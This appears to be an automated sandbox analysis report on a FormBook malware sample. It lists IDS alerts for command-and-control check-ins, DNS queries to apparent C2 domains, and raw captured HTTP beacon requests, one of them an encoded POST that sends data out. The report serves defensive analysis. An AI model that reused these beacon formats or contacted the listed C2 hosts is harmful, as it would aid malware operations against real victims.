Source:	Binary string: mscorlib.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Drawing.pdbq1 source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 0000000A.00000002.4128969978.00000000006BE000.00000002.00000001.01000000.00000008.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4128967885.00000000006BE000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: System.Dynamic.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Management.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Drawing.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: chkdsk.pdb source: aspnet_wp.exe, 00000005.00000002.1835368494.00000000051F7000.00000004.00000020.00020000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 0000000A.00000002.4129545365.0000000001108000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Management.ni.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Core.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.pdb- source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.ni.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3AAF.tmp.dmp.9.dr

Source: C:\Windows\SysWOW64\chkdsk.exe

Code function: 12_2_0081B5C0 FindFirstFileW,FindNextFileW,FindClose,

12_2_0081B5C0

Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then xor eax, eax	12_2_00809320
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then pop edi	12_2_0080D8A9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then pop edi	12_2_00811B46

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49743 -> 172.65.176.239:80
Source: Traffic	Snort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.4:49744 -> 162.241.216.140:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49744 -> 162.241.216.140:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49745 -> 162.241.216.140:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49747 -> 162.241.216.140:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49749 -> 57.151.38.169:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49750 -> 57.151.38.169:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49752 -> 57.151.38.169:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49753 -> 162.241.216.140:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49754 -> 162.241.216.140:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49756 -> 162.241.216.140:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49757 -> 217.160.0.111:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49758 -> 217.160.0.111:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49760 -> 217.160.0.111:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49761 -> 91.195.240.123:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49762 -> 91.195.240.123:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49764 -> 91.195.240.123:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49765 -> 162.0.237.22:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49766 -> 162.0.237.22:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49768 -> 162.0.237.22:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49769 -> 136.143.180.12:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49770 -> 136.143.180.12:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49772 -> 136.143.180.12:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49773 -> 103.168.172.37:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49774 -> 103.168.172.37:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49776 -> 103.168.172.37:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49777 -> 104.37.39.71:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49778 -> 104.37.39.71:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49780 -> 104.37.39.71:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49781 -> 199.59.243.225:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49782 -> 199.59.243.225:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49784 -> 199.59.243.225:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49785 -> 172.65.176.239:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49786 -> 162.241.216.140:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49787 -> 162.241.216.140:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49789 -> 162.241.216.140:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49790 -> 57.151.38.169:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49791 -> 57.151.38.169:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49793 -> 57.151.38.169:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49794 -> 162.241.216.140:80

Source: Joe Sandbox View

IP Address: 217.160.0.111 217.160.0.111

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
Source: Joe Sandbox View	ASN Name: ONECOMDK ONECOMDK
Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /mcz6/?l65lvjLx=D5+pF2/O5onkRgs/QJm4Uknwa72XtjRGMQdzYj/9XZpkwzi9ddj0crwo6H79wSPqAuXYaDgjxYH65NOwo1DiSXtozRCrs8BT1aTzU0SzNo1URyRzwyLi3Bw=&Znv8F=zltpR6V05ztTbh HTTP/1.1Host: www.dty377.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?l65lvjLx=jpQBXhuFRU/tY42AZC12Q1/B5+IE3XzQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREiblre7wMQ7hpfbmYAEsuIkYCegYwn6boLYQuO8=&Znv8F=zltpR6V05ztTbh HTTP/1.1Host: www.lenslaser.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?l65lvjLx=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1ga/G/HMKcAJl8ZLysNQgHdg+oe+l1VwrhC98=&Znv8F=zltpR6V05ztTbh HTTP/1.1Host: www.allinone24.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?l65lvjLx=jpQBXhuFRU/tY42AZC12Q1/B5+IE3XzQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREiblre7wMQ7hpfbmYAEsuIkYCegYwn6boLYQuO8=&Znv8F=zltpR6V05ztTbh HTTP/1.1Host: www.lenslaser.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?l65lvjLx=t2ltNu02BWCxFJkMInGc7SUNVmZAlmpo25Fvtgz0OT6/eZJtaFugFEP80bfDefIKNSUaDat+4U4ei33vOp33J3w7E/1DXRKVU7+ltx/Ze5a9KKXUCEtCgjk=&Znv8F=zltpR6V05ztTbh HTTP/1.1Host: www.carliente.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?l65lvjLx=+LASaW8sLlti/Y5p1q0qKU3hQBfGLeZfunbDEh0FE1w8Tz+VHrtWZSUefKogmen1MiEzwZmsfiIE4qB4y6VqrKvXOipPExFwKQmiwKnwFMVTTGbdQXrJvJk=&Znv8F=zltpR6V05ztTbh HTTP/1.1Host: www.walletweb367.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?l65lvjLx=Z7d5vO3PiPWE/zeJlxtYmOYnF8uMEonypBLuOElxuuV1BOUgEEq9TvThZhsN+4G3m8UtXtkpFAILmOKtc08U8eULhaLH/eruf+vtSehKJ3r2fKzbVPqM3Ks=&Znv8F=zltpR6V05ztTbh HTTP/1.1Host: www.deaybrid.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?l65lvjLx=5d/f0hfwoo/9d3f97tbdjxDk4KU85C4YC37M3UWhy4ALmXvbgMxGv66I6qe5jd4u2tKoxygbv/cknJWC1exftQvP2lviqJawgXV46wbQMN+Gc/xUQSNa8ks=&Znv8F=zltpR6V05ztTbh HTTP/1.1Host: www.jrksa.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?l65lvjLx=WM8YJa5qA0NkIP/fN4mRPH2hsfvjO1kWxn5RlfXsP+w6QT8BWCtnYGsQFWxr+5Q3wXsj3+rXjilTrq1L87WN5VMBaPcH6h4tJWWqH5H+VkhDr+c9eHm1vWk=&Znv8F=zltpR6V05ztTbh HTTP/1.1Host: www.celebration24.co.ukAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?l65lvjLx=PB65ht3xmDnV1ShWjeHediWpJ6xhKUn+w4dQHmlxp9S6BIZIF1eyIZ9SallNAheKgV6/CipsbblBAwuU+20rDr4rF7jlE8qBiXwygrRuGMbV3F1YqBDOThA=&Znv8F=zltpR6V05ztTbh HTTP/1.1Host: www.gledingakademiet.noAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?l65lvjLx=qn3zkYHztMKe8mzud8vq3qgzcmJ7Jd4FLz3cQj0k4MJfJlhRJYX+G77tvqK2UZX2Wgv5bTm3q1t3YjrK87HOPCWB0khZATxvEtVM+0yJiG12ulMvj5DktkI=&Znv8F=zltpR6V05ztTbh HTTP/1.1Host: www.zwervertjes.beAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?l65lvjLx=D5+pF2/O5onkRgs/QJm4Uknwa72XtjRGMQdzYj/9XZpkwzi9ddj0crwo6H79wSPqAuXYaDgjxYH65NOwo1DiSXtozRCrs8BT1aTzU0SzNo1URyRzwyLi3Bw=&Znv8F=zltpR6V05ztTbh HTTP/1.1Host: www.dty377.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?l65lvjLx=jpQBXhuFRU/tY42AZC12Q1/B5+IE3XzQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREiblre7wMQ7hpfbmYAEsuIkYCegYwn6boLYQuO8=&Znv8F=zltpR6V05ztTbh HTTP/1.1Host: www.lenslaser.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /mcz6/?l65lvjLx=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1ga/G/HMKcAJl8ZLysNQgHdg+oe+l1VwrhC98=&Znv8F=zltpR6V05ztTbh HTTP/1.1Host: www.allinone24.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

Source: global traffic	DNS traffic detected: DNS query: www.dty377.com
Source: global traffic	DNS traffic detected: DNS query: www.lenslaser.com
Source: global traffic	DNS traffic detected: DNS query: www.allinone24.shop
Source: global traffic	DNS traffic detected: DNS query: www.carliente.com
Source: global traffic	DNS traffic detected: DNS query: www.walletweb367.top
Source: global traffic	DNS traffic detected: DNS query: www.deaybrid.info
Source: global traffic	DNS traffic detected: DNS query: www.prizesupermarket.com
Source: global traffic	DNS traffic detected: DNS query: www.jrksa.info
Source: global traffic	DNS traffic detected: DNS query: www.cookedatthebottom.com
Source: global traffic	DNS traffic detected: DNS query: www.celebration24.co.uk
Source: global traffic	DNS traffic detected: DNS query: www.gledingakademiet.no
Source: global traffic	DNS traffic detected: DNS query: www.alfaspa.net
Source: global traffic	DNS traffic detected: DNS query: www.zwervertjes.be
Source: global traffic	DNS traffic detected: DNS query: www.maerealtysg.com
Source: global traffic	DNS traffic detected: DNS query: www.polhi.lol

Source: unknown

HTTP traffic detected: POST /mcz6/ HTTP/1.1Host: www.lenslaser.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.lenslaser.comReferer: http://www.lenslaser.com/mcz6/Connection: closeContent-Length: 205Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 75 72 34 68 55 52 48 36 48 6b 58 37 54 37 75 44 41 77 56 54 58 31 58 64 76 64 34 44 32 46 4c 56 56 41 6e 75 6a 79 34 73 6d 37 4d 36 64 6d 77 54 65 36 2b 34 6c 30 59 68 58 38 30 5a 36 56 57 30 30 35 73 2b 39 50 54 79 46 75 68 50 5a 4e 6c 61 4e 41 4f 6a 38 49 66 44 41 79 53 76 70 2b 50 36 65 43 63 53 70 4a 63 50 4e 39 51 56 2b 51 47 58 6b 6f 55 64 78 2b 6d 38 31 38 36 46 72 72 66 64 72 61 30 50 53 49 38 52 52 6e 76 38 36 42 6d 34 35 65 2b 4c 36 78 78 77 48 68 45 57 74 65 4d 74 4c 48 6a 48 6b 48 70 72 6a 31 62 50 56 51 50 5a 56 58 75 61 73 4c 36 52 43 61 67 31 51 41 41 61 42 77 3d 3d Data Ascii: l65lvjLx=ur4hURH6HkX7T7uDAwVTX1Xdvd4D2FLVVAnujy4sm7M6dmwTe6+4l0YhX80Z6VW005s+9PTyFuhPZNlaNAOj8IfDAySvp+P6eCcSpJcPN9QV+QGXkoUdx+m8186Frrfdra0PSI8RRnv86Bm45e+L6xxwHhEWteMtLHjHkHprj1bPVQPZVXuasL6RCag1QAAaBw==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jun 2024 11:25:42 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jun 2024 11:25:45 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jun 2024 11:25:47 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jun 2024 11:25:50 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
